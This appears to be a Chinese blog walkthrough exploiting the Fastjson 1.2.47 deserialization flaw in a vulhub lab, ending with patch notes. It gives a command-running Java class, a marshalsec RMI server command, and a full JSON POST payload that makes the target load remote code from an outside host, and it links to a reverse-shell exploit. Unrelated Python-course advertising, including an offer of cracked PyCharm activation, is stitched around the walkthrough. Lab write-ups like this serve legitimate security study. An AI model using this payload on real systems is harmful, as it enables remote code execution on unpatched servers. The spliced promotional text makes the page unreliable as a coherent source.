最后
不知道你们用的什么环境,我一般都是用的Python3.6环境和pycharm解释器,没有软件,或者没有资料,没人解答问题,都可以免费领取(包括今天的代码),过几天我还会做个视频教程出来,有需要也可以领取~
给大家准备的学习资料包括但不限于:
Python 环境、pycharm编辑器/永久激活/翻译插件
python 零基础视频教程
Python 界面开发实战教程
Python 爬虫实战教程
Python 数据分析实战教程
python 游戏开发实战教程
Python 电子书100本
Python 学习路线规划
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
漏洞利用限制
FastJson < 1.2.48
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.0.101 (虚拟机 Kali 2020.2 、Java1.8、Burp)
启动 fastjson 反序列化导致任意命令执行漏洞 环境
1.进入 vulhub 的 Fastjson 1.2.47 路径
cd /usr/local/tools/vulhub/fastjson/1.2.47-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep rce
访问 8090 端口
漏洞利用
同样的需要先使用 javac 编译一个 TouchFile.class 文件
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {“touch”, “/tmp/success”};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
或者直接利用上文中的 EXP https://github.com/CaijiOrz/fastjson-1.2.47-RCE , 该Exploit.java只是一段反弹shell的代码,需要修改为攻击机的ip和端口。[吐个槽,我反弹shell失败了,TouchFile倒是成功了]如下图:
这里我们直接使用 EXP 好了。
在该 EXP 目录下利用python模拟启动一个本地可以访问的服务器。
python -m SimpleHTTPServer 22222
同样的在当前目录启动LDAP服务,修改IP为当前这台服务器的IP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.98.192.99:22222/#TouchFile" 9999
至此,我们整个攻击环境已经准备好。
验证漏洞利用是否成功
利用我们的攻击环境,向靶场发送payload。
构造好的请求包发送如下,注意Content-type格式要json,并且是post请求。
POST / HTTP/1.1
Host: 139.196.87.102:8090
Accept: /
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 268
Content-Type: application/json
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://47.98.192.99:9999/EXploit”,
“autoCommit”:true
}
}
进入容器,查看 success 文件是否创建。
说实话, 反弹shell真折腾人!
修复建议
在1.2.48版本的补丁中,首先黑名单做了更新,其中就包含了java.lang.class这个类,并且MiscCodec中也将传入的cache参数置为了false,这样通过payload中a部分的java.lang.class引入JdbcRowSetImpl类,b部分通过mappings获取JdbcRowSetImpl类的方法就失效了,并且1.2.48以下开不开autotype都能打。
参考资料:
现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。
分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!